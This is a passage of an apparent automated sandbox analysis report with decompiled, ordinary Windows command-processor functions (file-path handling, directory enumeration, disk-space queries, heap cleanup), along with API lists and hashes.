                                    0x011e945e
                                    0x011e9461
                                    0x011e9461
                                    0x00000000
                                    0x011e9461
                                    0x011e9315
                                    0x011e931d
                                    0x011e9322
                                    0x011e9328
                                    0x011e9328
                                    0x011e932b
                                    0x011e932d
                                    0x011e933a
                                    0x00000000
                                    0x00000000
                                    0x011e9340
                                    0x011e9347
                                    0x011e934d
                                    0x011e934d
                                    0x011e9350
                                    0x011e9352
                                    0x011e935f
                                    0x00000000
                                    0x00000000
                                    0x011e936d
                                    0x011e9372
                                    0x011e9378
                                    0x011e9378
                                    0x011e937b
                                    0x011e937d
                                    0x011e938b
                                    0x011e9393
                                    0x011e939b
                                    0x011e93a1
                                    0x011e93a1
                                    0x011e93a4
                                    0x011e93a6
                                    0x011e93c1
                                    0x00000000
                                    0x00000000
                                    0x011e93cd
                                    0x011e93da
                                    0x011e93e2
                                    0x00000000
                                    0x011e93e2
                                    0x011d5305
                                    0x011d5362
                                    0x011d5365
                                    0x011d536b
                                    0x011d5373
                                    0x011d537f
                                    0x011e94dd
                                    0x011e94e2
                                    0x011e94e2
                                    0x011d5385
                                    0x011d538a
                                    0x011d53f8
                                    0x011d53f8
                                    0x011d539f
                                    0x011e94f3
                                    0x011e94f4
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011d539f
                                    0x011d530f
                                    0x011d5315
                                    0x011d5317
                                    0x011d5319
                                    0x011d532c
                                    0x011d5330
                                    0x00000000
                                    0x00000000
                                    0x011d5334
                                    0x011d533b
                                    0x011d533f
                                    0x00000000
                                    0x00000000
                                    0x011d5349
                                    0x011d534d
                                    0x011e9477
                                    0x011e947c
                                    0x011e9481
                                    0x011e9487
                                    0x011e9487
                                    0x011d5353
                                    0x011d5353
                                    0x011d5353
                                    0x011d535c
                                    0x011e9492
                                    0x011e949b
                                    0x011e94a1
                                    0x011e94a1
                                    0x011e94a4
                                    0x011e94a6
                                    0x011e94b7
                                    0x011e94bf
                                    0x011e94d1
                                    0x011e94d1
                                    0x011e94b7
                                    0x00000000
                                    0x011d531b
                                    0x011d531b
                                    0x011d531d
                                    0x011d531d
                                    0x011d531f
                                    0x011d5324
                                    0x00000000
                                    0x011d5326
                                    0x011d5326
                                    0x00000000
                                    0x011d5326
                                    0x011d5324
                                    0x011d52e7
                                    0x011d52e7
                                    0x011d52e9
                                    0x011d52e9
                                    0x011d52eb
                                    0x011d52f0
                                    0x00000000
                                    0x011d52f2
                                    0x011d52f2
                                    0x00000000
                                    0x011d52f2
                                    0x011d52f0

                                    APIs
                                    • memset.MSVCRT ref: 011D528C
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,00000000,?), ref: 011D5394
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D53D5
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$FullNamePath
                                    • String ID:
                                    • API String ID: 3158150540-0
                                    • Opcode ID: 7c3cb870a0a0bf4b48a417cfc42239b6faf1400a7c6be65ed5152e79111d7c78
                                    • Instruction ID: 1d65ef8af689fd46dd4e42ec56fa2d9855fdb2b9851c476d235c6caa985d31c1
                                    • Opcode Fuzzy Hash: 7c3cb870a0a0bf4b48a417cfc42239b6faf1400a7c6be65ed5152e79111d7c78
                                    • Instruction Fuzzy Hash: A102B535A005199BDF2DDFA8CC986A9B7F2FF88318F1941E9D80997245D774AE82CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E245C, Relevance: 9.2, APIs: 6, Instructions: 154fileCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 58%
                                    			E011E245C(WCHAR* __ecx, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v604;
				signed int _v608;
				void _v612;
				signed int _v616;
				void* _v620;
				intOrPtr _v624;
				WCHAR* _v628;
				void* _v632;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				intOrPtr _t44;
				void* _t45;
				void _t47;
				void* _t53;
				void _t54;
				void _t58;
				char* _t69;
				char* _t71;
				intOrPtr* _t73;
				signed int _t75;
				void* _t76;
				WCHAR* _t77;
				void* _t80;
				void* _t81;
				signed int _t83;
				void* _t84;
				void* _t91;
				void* _t96;
				void* _t97;
				short* _t99;
				void* _t100;
				void* _t101;
				void* _t102;
				void* _t103;
				int _t104;
				void* _t105;
				signed int _t106;
				signed int _t108;

				_t90 = __edx;
				_t77 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x274;
				_t42 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t42 ^ _t108;
				_t73 = __ecx;
				_v616 = __edx;
				_v628 = __ecx;
				_v624 = 0;
				_t99 =  &(__ecx[1]);
				do {
					_t44 =  *_t73;
					_t73 = _t73 + 2;
				} while (_t44 != 0);
				_t75 = _t73 - _t99 >> 1;
				if(_t75 > __edx) {
					L21:
					_t45 = 0;
				} else {
					_t97 =  &(__ecx[3]);
					_t101 = _t97;
					_v632 = _t101;
					do {
						_t47 =  *_t97 & 0x0000ffff;
						_v612 = _t47;
						if(_t47 == 0 || _t47 == 0x5c) {
							 *_t97 = 0;
							_t80 = FindFirstFileW(_t77,  &_v604);
							_t47 = _v612;
							 *_t97 = _t47;
							if(_t80 == 0xffffffff) {
								_t97 = _t97 + 2;
								_t101 = _t97;
								goto L17;
							} else {
								FindClose(_t80);
								if(_v604.cAlternateFileName != 0) {
									if(_a4 != 0) {
										L23:
										_t53 =  &(_v604.cAlternateFileName);
										goto L12;
									} else {
										_t69 =  &(_v604.cAlternateFileName);
										__imp___wcsnicmp(_t69, _t101, _t97 - _t101 >> 1);
										_t108 = _t108 + 0xc;
										if(_t69 != 0) {
											goto L11;
										} else {
											_t71 =  &(_v604.cFileName);
											__imp___wcsicmp(_t71,  &(_v604.cAlternateFileName));
											if(_t71 == 0) {
												goto L11;
											} else {
												goto L23;
											}
										}
									}
									L14:
									_t83 = _t81 - _t91 >> 1;
									_t90 = _t83 - (_t97 - _t101 >> 1);
									_v608 = _t83;
									_t75 = _t75 + _t90;
									if(_t75 >= _v616) {
										goto L21;
									} else {
										if(_t90 > 0) {
											_t84 = _t97;
											_t102 = _t84 + 2;
											do {
												_t58 =  *_t84;
												_t84 = _t84 + 2;
											} while (_t58 != _v624);
											_t103 = _t97 + _t90 * 2;
											memmove(_t103, _t97, 1 + (_t84 - _t102 >> 1) * 2);
											_t83 = _v608;
											_t108 = _t108 + 0xc;
											_t97 = _t103;
										}
										_t104 = _t83 + _t83;
										memcpy(_v632, _v620, _t104);
										_v632 = _v632 + _t104;
										_t108 = _t108 + 0xc;
										_t105 = _v632;
										_t90 = _v616 - (_t105 - _v628 >> 1);
										E011E1040(_t105, _v616 - (_t105 - _v628 >> 1), _t97);
										_t47 = _v616;
										_t101 = _t105 + 2;
										_t97 = _t101;
										L17:
										_t77 = _v628;
										_v632 = _t101;
										goto L6;
									}
									goto L8;
								} else {
									L11:
									_t53 =  &(_v604.cFileName);
								}
								L12:
								_t81 = _t53;
								_v620 = _t53;
								_t91 = _t81 + 2;
								do {
									_t54 =  *_t81;
									_t81 = _t81 + 2;
								} while (_t54 != _v624);
								goto L14;
							}
						} else {
							goto L6;
						}
						goto L8;
						L6:
						_t97 = _t97 + 2;
					} while (_t47 != 0);
					_t45 = 1;
				}
				L8:
				_pop(_t96);
				_pop(_t100);
				_pop(_t76);
				return E011E6FD0(_t45, _t76, _v8 ^ _t108, _t90, _t96, _t100);
			}












































                                    0x011e245c
                                    0x011e245c
                                    0x011e2464
                                    0x011e246a
                                    0x011e2471
                                    0x011e247a
                                    0x011e247c
                                    0x011e2483
                                    0x011e2487
                                    0x011e248b
                                    0x011e248e
                                    0x011e248e
                                    0x011e2491
                                    0x011e2494
                                    0x011e249b
                                    0x011e249f
                                    0x011e25d2
                                    0x011e25d2
                                    0x011e24a5
                                    0x011e24a5
                                    0x011e24a8
                                    0x011e24aa
                                    0x011e24ae
                                    0x011e24ae
                                    0x011e24b1
                                    0x011e24b8
                                    0x011e24e3
                                    0x011e24f2
                                    0x011e24f4
                                    0x011e24f8
                                    0x011e24fe
                                    0x011ed671
                                    0x011ed674
                                    0x00000000
                                    0x011e2504
                                    0x011e2505
                                    0x011e2514
                                    0x011e25a6
                                    0x011ed62e
                                    0x011ed62e
                                    0x00000000
                                    0x011e25ac
                                    0x011e25b3
                                    0x011e25bc
                                    0x011e25c2
                                    0x011e25c7
                                    0x00000000
                                    0x011e25cd
                                    0x011ed619
                                    0x011ed61e
                                    0x011ed628
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011ed628
                                    0x011e25c7
                                    0x011e2534
                                    0x011e2538
                                    0x011e2540
                                    0x011e2542
                                    0x011e2546
                                    0x011e254c
                                    0x00000000
                                    0x011e2552
                                    0x011e2554
                                    0x011ed63a
                                    0x011ed63c
                                    0x011ed63f
                                    0x011ed63f
                                    0x011ed642
                                    0x011ed645
                                    0x011ed64e
                                    0x011ed65d
                                    0x011ed663
                                    0x011ed667
                                    0x011ed66a
                                    0x011ed66a
                                    0x011e255a
                                    0x011e2566
                                    0x011e256b
                                    0x011e256f
                                    0x011e2572
                                    0x011e2585
                                    0x011e2587
                                    0x011e258c
                                    0x011e2590
                                    0x011e2593
                                    0x011e2595
                                    0x011e2595
                                    0x011e2599
                                    0x00000000
                                    0x011e2599
                                    0x00000000
                                    0x011e251a
                                    0x011e251a
                                    0x011e251a
                                    0x011e251a
                                    0x011e251e
                                    0x011e251e
                                    0x011e2520
                                    0x011e2524
                                    0x011e2527
                                    0x011e2527
                                    0x011e252a
                                    0x011e252d
                                    0x00000000
                                    0x011e2527
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x011e24bf
                                    0x011e24bf
                                    0x011e24c2
                                    0x011e24c9
                                    0x011e24c9
                                    0x011e24ca
                                    0x011e24d1
                                    0x011e24d2
                                    0x011e24d3
                                    0x011e24de

                                    APIs
                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,00000000), ref: 011E24EC
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011E2505
                                    • memcpy.MSVCRT ref: 011E2566
                                    • _wcsnicmp.MSVCRT ref: 011E25BC
                                    • _wcsicmp.MSVCRT ref: 011ED61E
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                    • String ID:
                                    • API String ID: 242869866-0
                                    • Opcode ID: de6a4b7375402375424036d3f698e5740b55eed9b4f24dc0db29432e51250165
                                    • Instruction ID: fd707ee37c3a39e8e56c084c0ecf49c5ba5a461ac25c78ef01de136c490cb250
                                    • Opcode Fuzzy Hash: de6a4b7375402375424036d3f698e5740b55eed9b4f24dc0db29432e51250165
                                    • Instruction Fuzzy Hash: 7551E5755047018BCB28CFA8DC685ABB7E9EFC8714F15492DF99AC3244EB30D945CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E7513, Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E011E7513() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0x11fd0b4; // 0x2833377e
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0x11fd0b4 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0x11fd0b4 = _t39;
				}
				_t37 =  !_t36;
				 *0x11fd0b8 = _t37;
				return _t37;
			}











                                    0x011e751b
                                    0x011e751f
                                    0x011e7523
                                    0x011e7536
                                    0x011e7540
                                    0x011e754c
                                    0x011e7555
                                    0x011e755e
                                    0x011e756f
                                    0x011e7576
                                    0x011e7582
                                    0x011e7585
                                    0x011e7589
                                    0x011e7593
                                    0x011e7598
                                    0x011e7598
                                    0x011e759a
                                    0x011e759a
                                    0x011e75a0
                                    0x011e75a3
                                    0x011e75ac

                                    APIs
                                    • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 011E7540
                                    • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 011E754F
                                    • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 011E7558
                                    • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 011E7561
                                    • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 011E7576
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                    • String ID:
                                    • API String ID: 1445889803-0
                                    • Opcode ID: ac9f1ae1da07457771ca0440c27a2869b638c5cfcaaa2793f40fc510ae5e922c
                                    • Instruction ID: 91f36294d6aba23adbd744778a569813f9453fb769e7d45e21dc8ef99227def7
                                    • Opcode Fuzzy Hash: ac9f1ae1da07457771ca0440c27a2869b638c5cfcaaa2793f40fc510ae5e922c
                                    • Instruction Fuzzy Hash: ED113A71D05208EBDF24DFF8E65C6AEBBF5EF58314F55486AD411E7248EB309A408B41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011FA0D2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 86%
                                    			E011FA0D2(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				int _v20;
				char _v24;
				int _v28;
				void _v548;
				intOrPtr _v552;
				intOrPtr _v560;
				union _ULARGE_INTEGER _v564;
				union _ULARGE_INTEGER _v572;
				union _ULARGE_INTEGER _v580;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				WCHAR* _t51;
				char _t60;
				WCHAR* _t69;
				void* _t77;
				void* _t78;
				void* _t79;
				signed int _t81;

				_t76 = __edx;
				_t35 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t35 ^ _t81;
				_t79 = __edx;
				_v552 = _a8;
				_t78 = __ecx;
				E011DB6B9(__ecx);
				_v28 = 0;
				_v20 = 0x104;
				_t60 = 1;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				if(E011E0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x00007ee3) + 0x104) >= 0) {
					E011E0D89(_t76, _t79);
					_t51 = _v28;
					_t69 = _t51;
					if(_t51 == 0) {
						_t69 =  &_v548;
					}
					if( *_t69 != 0 && _t69[1] == 0x3a && _t69[2] == 0) {
						E011E0CF2(_t76, "\\");
						_t51 = _v28;
					}
					_v560 = 0;
					_v564.LowPart = 0;
					if(_t51 == 0) {
						_t51 =  &_v548;
					}
					GetDiskFreeSpaceExW(_t51,  &_v564,  &_v580,  &_v572);
					_t77 = 6;
					E011F7A11(_t78, _t77);
					_t54 = _v28;
					if(_v28 == 0) {
						_t54 =  &_v548;
					}
					_t76 =  &_v564;
					E011FAC75(_a4,  &_v564, 0xe, _t54, _v20);
					_t79 = _v28;
					if(_t79 == 0) {
						_t79 =  &_v548;
					}
					E011E274C(0x1213d00, 0x104, L"%5lu", _v552);
					_push(_t79);
					_t60 = E011F7C83(0x1213d00, _t76, _t78, 0x2379, 2, 0x1213d00);
				}
				__imp__??_V@YAXPAX@Z();
				return E011E6FD0(_t60, _t60, _v8 ^ _t81, _t76, _t78, _t79, _v28);
			}
























                                    0x011fa0d2
                                    0x011fa0dd
                                    0x011fa0e4
                                    0x011fa0ed
                                    0x011fa0ef
                                    0x011fa0f5
                                    0x011fa0f7
                                    0x011fa105
                                    0x011fa110
                                    0x011fa113
                                    0x011fa115
                                    0x011fa118
                                    0x011fa141
                                    0x011fa14e
                                    0x011fa153
                                    0x011fa156
                                    0x011fa15a
                                    0x011fa15c
                                    0x011fa15c
                                    0x011fa167
                                    0x011fa181
                                    0x011fa186
                                    0x011fa186
                                    0x011fa189
                                    0x011fa18f
                                    0x011fa197
                                    0x011fa199
                                    0x011fa199
                                    0x011fa1b5
                                    0x011fa1bd
                                    0x011fa1c0
                                    0x011fa1c5
                                    0x011fa1ca
                                    0x011fa1cc
                                    0x011fa1cc
                                    0x011fa1d8
                                    0x011fa1e1
                                    0x011fa1e6
                                    0x011fa1eb
                                    0x011fa1ed
                                    0x011fa1ed
                                    0x011fa209
                                    0x011fa20e
                                    0x011fa220
                                    0x011fa220
                                    0x011fa225
                                    0x011fa23e

                                    APIs
                                    • memset.MSVCRT ref: 011FA118
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 011FA1B5
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FA225
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: memset$DiskFreeSpace
                                    • String ID: %5lu
                                    • API String ID: 2448137811-2100233843
                                    • Opcode ID: ebb02f2ffb30847b32b531025e7b0ba2a3c78bd1bdf5fa6874c0b213cc1816fe
                                    • Instruction ID: 87fd769d561e228706daa58c6bbd286e175035a5022efa5d7c3923d0a213f1a9
                                    • Opcode Fuzzy Hash: ebb02f2ffb30847b32b531025e7b0ba2a3c78bd1bdf5fa6874c0b213cc1816fe
                                    • Instruction Fuzzy Hash: 46417A71E002196BDF29DBA4DC99AEEB7B8FF18344F04409DE609A7141E7749E85CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F1914, Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E011F1914(void* __ecx) {
				void* _t20;
				void* _t22;
				void* _t23;
				void** _t25;

				_t23 = __ecx;
				_t22 =  *(__ecx + 0x10);
				_t20 = _t22 + ( *(__ecx + 0x14) & 0x0000ffff) * 0x34;
				if(_t22 != _t20) {
					_t25 = _t22 + 0x2c;
					do {
						RtlFreeHeap(GetProcessHeap(), 0,  *_t25);
						 *_t25 =  *_t25 & 0x00000000;
						_t25 =  &(_t25[0xd]);
						 *(_t25 - 0x30) =  *(_t25 - 0x30) & 0x00000000;
					} while (_t25 - 0x2c != _t20);
					_t22 =  *(_t23 + 0x10);
				}
				RtlFreeHeap(GetProcessHeap(), 0, _t22);
				 *(_t23 + 0x10) =  *(_t23 + 0x10) & 0;
				 *((intOrPtr*)(_t23 + 0x14)) = 0;
				return 0;
			}







                                    0x011f1918
                                    0x011f191e
                                    0x011f1924
                                    0x011f1928
                                    0x011f192b
                                    0x011f192e
                                    0x011f1939
                                    0x011f193f
                                    0x011f1942
                                    0x011f1945
                                    0x011f194c
                                    0x011f1950
                                    0x011f1953
                                    0x011f195e
                                    0x011f1966
                                    0x011f1969
                                    0x011f196e

                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,011F1735), ref: 011F1932
                                    • RtlFreeHeap.NTDLL(00000000,?,?), ref: 011F1939
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,011F1735), ref: 011F1957
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F195E
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: 7fa54d8046fcaec72ed39ab8255b7baf4830f4fc760f2e6ce6597c242f6d95ab
                                    • Instruction ID: 7343d35b5ab0400354313713700172d81f559cc8d294384285f59823aef86930
                                    • Opcode Fuzzy Hash: 7fa54d8046fcaec72ed39ab8255b7baf4830f4fc760f2e6ce6597c242f6d95ab
                                    • Instruction Fuzzy Hash: 26F04F72610201ABDB24DFA0E88CBA5B7F8FF58326F10092DF641C6440EB74E5D5CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E6FE3, Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 100%
                                    			E011E6FE3(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}



                                    0x011e6fea
                                    0x011e6ff3
                                    0x011e700c

                                    APIs
                                    • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E7119,011D1000), ref: 011E6FEA
                                    • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(011E7119,?,011E7119,011D1000), ref: 011E6FF3
                                    • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,011E7119,011D1000), ref: 011E6FFE
                                    • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,011E7119,011D1000), ref: 011E7005
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.941712573.00000000011D0000.00000040.00020000.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000B.00000002.941862977.0000000001219000.00000040.00020000.sdmp Download File
                                    • Associated: 0000000B.00000002.941891236.000000000121D000.00000040.00020000.sdmp Download File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_11d0000_cmd.jbxd
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                    • String ID:
                                    • API String ID: 3231755760-0
                                    • Opcode ID: 14b00860cd93b38cd020d9d54970c92856937f214fa9e9bccdeaaf5e0bc664c8
                                    • Instruction ID: 31835f397d3bad6aebd802a71f7ccd3bac52b24c836e675622d32b9b528a64e3
                                    • Opcode Fuzzy Hash: 14b00860cd93b38cd020d9d54970c92856937f214fa9e9bccdeaaf5e0bc664c8
                                    • Instruction Fuzzy Hash: 48D0C932580104ABCF20ABE1F81CA893E28EB9431AF044420F309C2014CE714491CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F31DC, Relevance: 4.8, APIs: 3, Instructions: 274fileCOMMONCrypto
                                    Download Yara Rule
                                    C-Code - Quality: 93%
                                    			E011F31DC(void* __ecx, long __edx, long _a4, intOrPtr _a8, signed short* _a12) {
				signed int _v8;
				char _v564;
				struct _WIN32_FIND_DATAW _v612;
				signed short* _v616;
				signed int _v620;
				signed int _v624;
				void* _v628;
				signed int _v632;
				short* _v636;
				intOrPtr* _v640;
				intOrPtr _v644;
				short* _v652;
				intOrPtr _v656;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t65;
				intOrPtr _t68;
				intOrPtr _t69;
				signed int _t71;
				intOrPtr _t83;
				WCHAR* _t87;
				signed int _t96;
				signed int _t97;
				signed int _t98;
				signed int _t99;
				short _t100;
				intOrPtr _t101;
				WCHAR* _t107;
				signed short* _t119;
				void* _t120;
				short* _t121;
				signed int _t123;
				intOrPtr _t124;
				signed int _t125;
				void* _t129;
				signed short* _t130;
				short* _t134;
				intOrPtr* _t137;
				WCHAR* _t142;
				char* _t146;
				char* _t147;
				short* _t148;
				intOrPtr* _t149;
				WCHAR* _t157;
				intOrPtr* _t162;
				WCHAR* _t168;
				signed int _t170;
				void* _t177;
				signed short* _t178;
				short* _t179;
				signed int _t180;
				void* _t181;
				signed int _t183;
				signed int _t185;
				void* _t186;
				WCHAR* _t189;
				intOrPtr* _t191;
				signed int _t192;

				_t194 = (_t192 & 0xfffffff8) - 0x274;
				_t65 =  *0x11fd0b4; // 0x2833377e
				_v8 = _t65 ^ (_t192 & 0xfffffff8) - 0x00000274;
				_v612.ftCreationTime.dwFileAttributes = __edx;
				_t162 = __ecx;
				_t119 = _a12;
				_v612.dwFileAttributes = _a4;
				_v628 = __ecx;
				_t7 = _t162 + 2; // 0x2
				_t129 = _t7;
				_v616 = _t119;
				_t185 = 0;
				do {
					_t68 =  *_t162;
					_t162 = _t162 + 2;
				} while (_t68 != 0);
				_t130 = _t119;
				_t164 = _t162 - _t129 >> 1;
				if( *_t119 == 0) {
					L53:
					_t69 = 0;
				} else {
					do {
						_t178 = _t130;
						do {
							_t71 =  *_t130 & 0x0000ffff;
							_t130 =  &(_t130[1]);
						} while (_t71 != 0);
						_t185 = _t185 + (_t130 - _t178 >> 1) + _t164;
					} while ( *_t130 != 0);
					if(0 == _t185) {
						goto L53;
					} else {
						_t9 = _t185 + 1; // 0x1
						_t187 = _t9 & 0x0000ffff;
						_v624 = _t9 & 0x0000ffff;
						_t179 = E011E00B0(_t187 + _t187);
						if(_t179 != 0) {
							_t134 = 0;
							_v632 = _t119;
							_t121 = _t179;
							if( *_v616 != 0) {
								do {
									E011E1040(_t121, _t187 - (_t121 - _t179 >> 1), _v628);
									E011E18C0(_t121, _t187 - (_t121 - _t179 >> 1), _v636);
									_t191 = E011DD7E6(_v640);
									_t134 = _t121;
									_v640 = _t191;
									_t121 = E011DD7E6(_t134);
									_t187 = _v632;
								} while ( *_t191 != 0);
							}
							_push(_t134);
							 *_t121 = 0;
							_v644 = E011D7EEC(_t121, _v612.ftCreationTime.dwFileAttributes, _v612.dwFileAttributes, _a8, _t179);
							E011E0040(_t179);
							_t122 = _v640;
							_t137 = _v640;
							_t24 = _t137 + 2; // 0x2
							_t164 = _t24;
							do {
								_t83 =  *_t137;
								_t137 = _t137 + 2;
							} while (_t83 != 0);
							_t25 = (_t137 - _t164 >> 1) + 2; // 0x0
							_t180 = _t25;
							_v624 = _t180;
							_t189 = E011E00B0(_t180 + _t180);
							if(_t189 == 0) {
								goto L8;
							} else {
								E011E1040(_t189, _t180, _t122);
								_t87 = _t189;
								_t142 = _t189;
								if( *_t189 != 0) {
									do {
										_t142 = _t87;
										_t87 =  &(_t87[1]);
									} while ( *_t87 != 0);
								}
								_t28 =  &(_t142[1]); // 0x2
								_t164 = _t180;
								_v632 = _t28;
								E011E18C0(_t189, _t180, "*");
								_t123 = FindFirstFileW(_t189,  &_v612);
								_v632 = _t123;
								 *_v636 = 0;
								if(_t123 == 0xffffffff) {
									_t124 = _v636;
								} else {
									do {
										if((_v612.ftCreationTime.dwFileAttributes & 0x00000010) == 0) {
											L46:
											_t124 = _v636;
											goto L47;
										} else {
											_t146 = ".";
											_t96 =  &_v564;
											while(1) {
												_t164 =  *_t96;
												if(_t164 !=  *_t146) {
													break;
												}
												if(_t164 == 0) {
													L23:
													_t125 = 0;
													_t97 = 0;
												} else {
													_t164 =  *((intOrPtr*)(_t96 + 2));
													_t38 =  &(_t146[2]); // 0x200000
													if(_t164 !=  *_t38) {
														break;
													} else {
														_t96 = _t96 + 4;
														_t146 =  &(_t146[4]);
														if(_t164 != 0) {
															continue;
														} else {
															goto L23;
														}
													}
												}
